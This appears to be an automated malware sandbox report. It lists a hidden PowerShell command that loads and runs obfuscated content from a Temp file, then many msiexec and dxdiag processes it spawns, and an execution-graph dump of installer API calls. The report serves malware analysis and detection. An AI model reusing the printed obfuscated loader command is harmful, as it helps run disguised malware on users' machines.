                        Commandline:powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "
                        Imagebase:0x1d0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:3
                        Start time:22:35:47
                        Start date:10/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7b52e0000
                        File size:875'008 bytes
                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:4
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0xed0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:11
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:13
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:14
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:15
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:16
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:17
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:18
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:19
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:20
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:21
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:22
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:23
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:24
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:25
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:26
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:27
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:28
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:29
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:30
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:31
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:32
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:33
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:34
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:35
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:36
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:37
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:38
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:39
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:40
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:41
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true


                          Execution Graph

                          Execution Coverage:26.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.6%
                          Total number of Nodes:1321
                          Total number of Limit Nodes:34
405bf6 3444->3445 3446 405c10 3445->3446 3447 405bfa 3445->3447 3449 4053d1 28 API calls 3446->3449 3451 4053d1 28 API calls 3447->3451 3447->3457 3449->3457 3450 405b9b FindNextFileA 3452 405bb3 FindClose 3450->3452 3450->3460 3453 405c07 3451->3453 3452->3432 3454 406066 40 API calls 3453->3454 3454->3457 3456 405a4f 64 API calls 3456->3460 3458 4053d1 28 API calls 3458->3450 3459 4053d1 28 API calls 3459->3460 3460->3442 3460->3450 3460->3456 3460->3458 3460->3459 3461 406066 40 API calls 3460->3461 3481 40628d lstrcpynA 3460->3481 3482 405a07 3460->3482 3461->3460 3493 40628d lstrcpynA 3462->3493 3464 405d1e 3465 405cb8 4 API calls 3464->3465 3466 405d24 3465->3466 3467 405a6f 3466->3467 3468 406587 5 API calls 3466->3468 3467->3428 3467->3429 3474 405d34 3468->3474 3469 405d5f lstrlenA 3470 405d6a 3469->3470 3469->3474 3472 405c1f 3 API calls 3470->3472 3471 406620 2 API calls 3471->3474 3473 405d6f GetFileAttributesA 3472->3473 3473->3467 3474->3467 3474->3469 3474->3471 3475 405c66 2 API calls 3474->3475 3475->3469 3476->3431 3478 405c73 3477->3478 3479 405c84 3478->3479 3480 405c78 CharPrevA 3478->3480 3479->3437 3480->3478 3480->3479 3481->3460 3494 405dfb GetFileAttributesA 3482->3494 3485 405a34 3485->3460 3486 405a22 RemoveDirectoryA 3488 405a30 3486->3488 3487 405a2a DeleteFileA 3487->3488 3488->3485 3489 405a40 SetFileAttributesA 3488->3489 3489->3485 3491 405bea 3490->3491 3492 405c39 lstrcatA 3490->3492 3491->3444 3492->3491 3493->3464 3495 405a13 3494->3495 3496 405e0d SetFileAttributesA 3494->3496 3495->3485 3495->3486 3495->3487 3496->3495 3497 4033d8 SetErrorMode GetVersionExA 3498 40342a GetVersionExA 3497->3498 3500 403469 3497->3500 3499 403446 3498->3499 3498->3500 3499->3500 3501 4034ed 3500->3501 3502 4066b5 5 API calls 3500->3502 3503 406647 3 API calls 3501->3503 3502->3501 3504 403503 lstrlenA 3503->3504 3504->3501 3505 403513 3504->3505 3506 4066b5 5 API calls 3505->3506 3507 40351a 3506->3507 3508 4066b5 5 API calls 3507->3508 3509 
403521 3508->3509 3510 4066b5 5 API calls 3509->3510 3511 40352d #17 OleInitialize SHGetFileInfoA 3510->3511 3586 40628d lstrcpynA 3511->3586 3514 40357b GetCommandLineA 3587 40628d lstrcpynA 3514->3587 3516 40358d 3517 405c4a CharNextA 3516->3517 3518 4035b4 CharNextA 3517->3518 3524 4035c3 3518->3524 3519 403689 3520 40369d GetTempPathA 3519->3520 3588 4033a7 3520->3588 3522 4036b5 3525 4036b9 GetWindowsDirectoryA lstrcatA 3522->3525 3526 40370f DeleteFileA 3522->3526 3523 405c4a CharNextA 3523->3524 3524->3519 3524->3523 3530 40368b 3524->3530 3527 4033a7 12 API calls 3525->3527 3598 402f31 GetTickCount GetModuleFileNameA 3526->3598 3529 4036d5 3527->3529 3529->3526 3532 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3529->3532 3682 40628d lstrcpynA 3530->3682 3531 403722 3533 4037ba ExitProcess CoUninitialize 3531->3533 3536 4037a7 3531->3536 3543 405c4a CharNextA 3531->3543 3535 4033a7 12 API calls 3532->3535 3537 4037d1 3533->3537 3538 403928 3533->3538 3539 403707 3535->3539 3626 403a96 3536->3626 3685 4059a3 3537->3685 3541 403930 GetCurrentProcess OpenProcessToken 3538->3541 3542 4039a6 ExitProcess 3538->3542 3539->3526 3539->3533 3547 403976 3541->3547 3548 403947 LookupPrivilegeValueA AdjustTokenPrivileges 3541->3548 3549 40373c 3543->3549 3546 4037b7 3546->3533 3551 4066b5 5 API calls 3547->3551 3548->3547 3552 403781 3549->3552 3553 4037e6 3549->3553 3554 40397d 3551->3554 3556 405d0d 18 API calls 3552->3556 3555 40590e 5 API calls 3553->3555 3557 403992 ExitWindowsEx 3554->3557 3560 40399f 3554->3560 3558 4037eb lstrlenA 3555->3558 3559 40378d 3556->3559 3557->3542 3557->3560 3689 40628d lstrcpynA 3558->3689 3559->3533 3683 40628d lstrcpynA 3559->3683 3562 40140b 2 API calls 3560->3562 3562->3542 3563 403803 3570 40381b 3563->3570 3690 40628d lstrcpynA 3563->3690 3565 40379c 3684 40628d lstrcpynA 3565->3684 3568 403839 wsprintfA 3569 406320 21 API calls 3568->3569 3569->3570 3570->3568 3571 403867 3570->3571 3571->3533 
3571->3568 3571->3570 3572 405897 2 API calls 3571->3572 3573 4058f1 2 API calls 3571->3573 3574 403877 GetFileAttributesA 3571->3574 3575 4038af SetCurrentDirectoryA 3571->3575 3578 4038aa 3571->3578 3580 405a4f 71 API calls 3571->3580 3581 406066 40 API calls 3571->3581 3582 406320 21 API calls 3571->3582 3583 405926 2 API calls 3571->3583 3584 403918 CloseHandle 3571->3584 3585 406620 2 API calls 3571->3585 3572->3571 3573->3571 3574->3571 3576 403883 DeleteFileA 3574->3576 3577 406066 40 API calls 3575->3577 3576->3571 3579 4038be CopyFileA 3577->3579 3578->3533 3579->3533 3579->3571 3580->3571 3581->3571 3582->3571 3583->3571 3584->3533 3585->3571 3586->3514 3587->3516 3589 406587 5 API calls 3588->3589 3591 4033b3 3589->3591 3590 4033bd 3590->3522 3591->3590 3592 405c1f 3 API calls 3591->3592 3593 4033c5 3592->3593 3594 4058f1 2 API calls 3593->3594 3595 4033cb 3594->3595 3596 405e4f 2 API calls 3595->3596 3597 4033d6 3596->3597 3597->3522 3691 405e20 GetFileAttributesA CreateFileA 3598->3691 3600 402f71 3601 402f81 3600->3601 3692 40628d lstrcpynA 3600->3692 3601->3531 3603 402f97 3604 405c66 2 API calls 3603->3604 3605 402f9d 3604->3605 3693 40628d lstrcpynA 3605->3693 3607 402fa8 GetFileSize 3622 4030a2 3607->3622 3625 402fbf 3607->3625 3609 4030ab 3609->3601 3611 4030db GlobalAlloc 3609->3611 3706 403390 SetFilePointer 3609->3706 3610 40337a ReadFile 3610->3625 3705 403390 SetFilePointer 3611->3705 3613 40310e 3617 402ecd 6 API calls 3613->3617 3615 4030c4 3618 40337a ReadFile 3615->3618 3616 4030f6 3619 403168 35 API calls 3616->3619 3617->3601 3620 4030cf 3618->3620 3623 403102 3619->3623 3620->3601 3620->3611 3621 402ecd 6 API calls 3621->3625 3694 402ecd 3622->3694 3623->3601 3623->3623 3624 40313f SetFilePointer 3623->3624 3624->3601 3625->3601 3625->3610 3625->3613 3625->3621 3625->3622 3627 4066b5 5 API calls 3626->3627 3628 403aaa 3627->3628 3629 403ab0 3628->3629 3630 403ac2 3628->3630 3715 4061eb wsprintfA 3629->3715 3631 406174 3 API calls 
3630->3631 3632 403aed 3631->3632 3634 403b0b lstrcatA 3632->3634 3636 406174 3 API calls 3632->3636 3635 403ac0 3634->3635 3707 403d5b 3635->3707 3636->3634 3639 405d0d 18 API calls 3640 403b3d 3639->3640 3641 403bc6 3640->3641 3643 406174 3 API calls 3640->3643 3642 405d0d 18 API calls 3641->3642 3644 403bcc 3642->3644 3645 403b69 3643->3645 3646 403bdc LoadImageA 3644->3646 3647 406320 21 API calls 3644->3647 3645->3641 3650 403b85 lstrlenA 3645->3650 3654 405c4a CharNextA 3645->3654 3648 403c82 3646->3648 3649 403c03 RegisterClassA 3646->3649 3647->3646 3652 40140b 2 API calls 3648->3652 3651 403c39 SystemParametersInfoA CreateWindowExA 3649->3651 3681 403c8c 3649->3681 3655 403b93 lstrcmpiA 3650->3655 3656 403bb9 3650->3656 3651->3648 3653 403c88 3652->3653 3660 403d5b 22 API calls 3653->3660 3653->3681 3658 403b83 3654->3658 3655->3656 3659 403ba3 GetFileAttributesA 3655->3659 3657 405c1f 3 API calls 3656->3657 3661 403bbf 3657->3661 3658->3650 3662 403baf 3659->3662 3664 403c99 3660->3664 3716 40628d lstrcpynA 3661->3716 3662->3656 3663 405c66 2 API calls 3662->3663 3663->3656 3666 403ca5 ShowWindow 3664->3666 3667 403d28 3664->3667 3669 406647 3 API calls 3666->3669 3668 4054a3 5 API calls 3667->3668 3670 403d2e 3668->3670 3671 403cbd 3669->3671 3672 403d32 3670->3672 3673 403d4a 3670->3673 3674 403ccb GetClassInfoA 3671->3674 3676 406647 3 API calls 3671->3676 3679 40140b 2 API calls 3672->3679 3672->3681 3675 40140b 2 API calls 3673->3675 3677 403cf5 DialogBoxParamA 3674->3677 3678 403cdf GetClassInfoA RegisterClassA 3674->3678 3675->3681 3676->3674 3680 40140b 2 API calls 3677->3680 3678->3677 3679->3681 3680->3681 3681->3546 3682->3520 3683->3565 3684->3536 3686 4059b8 3685->3686 3687 4037de ExitProcess 3686->3687 3688 4059cc MessageBoxIndirectA 3686->3688 3688->3687 3689->3563 3690->3570 3691->3600 3692->3603 3693->3607 3695 402ed6 3694->3695 3696 402eee 3694->3696 3697 402ee6 3695->3697 3698 402edf DestroyWindow 3695->3698 3699 402ef6 3696->3699 3700 
402efe GetTickCount 3696->3700 3697->3609 3698->3697 3701 4066f1 2 API calls 3699->3701 3702 402f0c CreateDialogParamA ShowWindow 3700->3702 3703 402f2f 3700->3703 3704 402efc 3701->3704 3702->3703 3703->3609 3704->3609 3705->3616 3706->3615 3708 403d6f 3707->3708 3717 4061eb wsprintfA 3708->3717 3710 403de0 3711 403e14 22 API calls 3710->3711 3713 403de5 3711->3713 3712 403b1b 3712->3639 3713->3712 3714 406320 21 API calls 3713->3714 3714->3713 3715->3635 3716->3641 3717->3710 3884 402758 3885 402a6c 3884->3885 3886 40275f 3884->3886 3887 402c3c 21 API calls 3886->3887 3888 402766 3887->3888 3889 402775 SetFilePointer 3888->3889 3889->3885 3890 402785 3889->3890 3892 4061eb wsprintfA 3890->3892 3892->3885 3893 401e5a GetDC 3894 402c3c 21 API calls 3893->3894 3895 401e6c GetDeviceCaps MulDiv ReleaseDC 3894->3895 3896 402c3c 21 API calls 3895->3896 3897 401e9d 3896->3897 3898 406320 21 API calls 3897->3898 3899 401eda CreateFontIndirectA 3898->3899 3900 40264d 3899->3900 2892 4015e0 2911 402c5e 2892->2911 2896 401649 2898 401677 2896->2898 2899 40164e 2896->2899 2902 401423 28 API calls 2898->2902 2933 401423 2899->2933 2907 40166f 2902->2907 2906 401660 SetCurrentDirectoryA 2906->2907 2908 401631 GetFileAttributesA 2910 4015ef 2908->2910 2910->2896 2910->2908 2923 405c4a 2910->2923 2927 40590e 2910->2927 2930 405897 CreateDirectoryA 2910->2930 2937 4058f1 CreateDirectoryA 2910->2937 2912 402c6a 2911->2912 2940 406320 2912->2940 2915 4015e7 2917 405cb8 CharNextA CharNextA 2915->2917 2918 405ce3 2917->2918 2919 405cd3 2917->2919 2921 405c4a CharNextA 2918->2921 2922 405d03 2918->2922 2919->2918 2920 405cde CharNextA 2919->2920 2920->2922 2921->2918 2922->2910 2924 405c50 2923->2924 2925 405c63 2924->2925 2926 405c56 CharNextA 2924->2926 2925->2910 2926->2924 2928 4066b5 5 API calls 2927->2928 2929 405915 2928->2929 2929->2910 2931 4058e3 2930->2931 2932 4058e7 GetLastError 2930->2932 2931->2910 2932->2931 2987 4053d1 2933->2987 2936 40628d lstrcpynA 2936->2906 2938 
